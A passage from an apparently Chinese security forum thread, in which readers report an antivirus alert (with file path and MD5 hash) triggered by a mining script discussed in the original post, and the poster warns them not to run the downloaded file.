精确度: 不确切
威胁级别: 高
对象类型: 文件
对象名称: f_0011ea
对象路径: C:\Users\ThinkPad\AppData\Local\Microsoft\Edge\User Data\Default\Cache
MD5: 22859EB6103A289BCA594D71AF120150
原因: 专家分析
数据库发布日期: 昨天,2021/11/8 23:37:00

limit7 posted on 2021-11-9 17:52
  chuxia12 posted on 2021-11-9 15:09
  I can't follow it, but the OP is impressive.

Hk_Mayfly (OP) posted on 2021-11-9 15:26
  此ID不存在 posted on 2021-11-9 15:11
  Kaspersky flags this page as malicious

  After allowing it, a threat detection is reported

That is the download path of the mining script; just don't run it after downloading.

墨白先生 posted on 2021-11-9 15:35
I can't follow it, but the OP is impressive.

Hao轩 posted on 2021-11-9 16:15
Once a miner gets onto a machine it becomes noticeably sluggish; I hope everyone stays on guard against this.

Bboxer posted on 2021-11-9 16:25
I can't follow it, but the OP is impressive.

Scy_91888 posted on 2021-11-9 16:27
Thanks for sharing, bookmarked for now.

DbQ posted on 2021-11-9 16:45
I don't understand it, but I am deeply impressed.